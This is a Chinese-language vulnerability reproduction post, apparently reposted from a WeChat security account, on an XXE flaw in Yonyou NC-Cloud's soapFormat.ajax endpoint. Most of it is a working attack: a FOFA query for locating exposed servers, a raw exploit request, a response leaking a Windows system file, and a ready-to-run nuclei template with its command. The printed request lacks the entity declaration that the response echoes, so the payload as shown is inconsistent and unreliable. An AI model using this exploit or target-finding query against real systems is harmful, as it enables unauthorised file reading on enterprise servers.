免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
福利:小编整理了大量电子书和护网常用工具,在文末免费获取。
01
—
漏洞名称
用友NC-Cloud soapFormat XXE漏洞
02
—
漏洞影响
用友NC-Cloud
03
—
漏洞描述
用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。
04
—
body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
05
—
漏洞复现
向靶场发送如下数据包,查看靶场的C://windows/win.ini文件
POST /uapws/soapFormat.ajax HTTP/1.1Host: 192.168.40.130:8989User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Content-Length: 263Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1msg=<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
响应内容如下
HTTP/1.1 200 OKConnection: closeContent-Length: 481Date: Thu, 28 Dec 2023 03:36:30 GMTServer: Apache-Coyote/1.1<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini" >]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server; for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1CMCDLLNAME32=mapi32.dllCMC=1MAPIX=1MAPIXVER=1.0.0.1OLEMessaging=1</faultcode></soap:Fault></soap:Body></soap:Envelope>
漏洞复现成功
06
—
nuclei poc
poc文件内容如下
id: yonyou-nc-cloud-soapFormat-xxeinfo:name: 用友NC-Cloud soapFormat XXE漏洞author: fgzseverity: criticaldescription: 用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。metadata:max-request: 1fofa-query: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"verified: truerequests:- raw:- |+POST /uapws/soapFormat.ajax HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 259msg=<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0amatchers:- type: dsldsl:- "status_code == 200 && contains(body, 'for 16-bit app')"
运行POC
nuclei.exe -t mypoc/用友/nc-cloud/yonyou-nc-cloud-soapFormat-xxe.yaml -u http://192.168.40.130:8989
07
—
修复建议
用友安全中心已经发布补丁,请及时修复。
https://security.yonyou.com/#/home08
—
原文始发于微信公众号(AI与网安):【漏洞复现】用友NC-Cloud soapFormat XXE漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论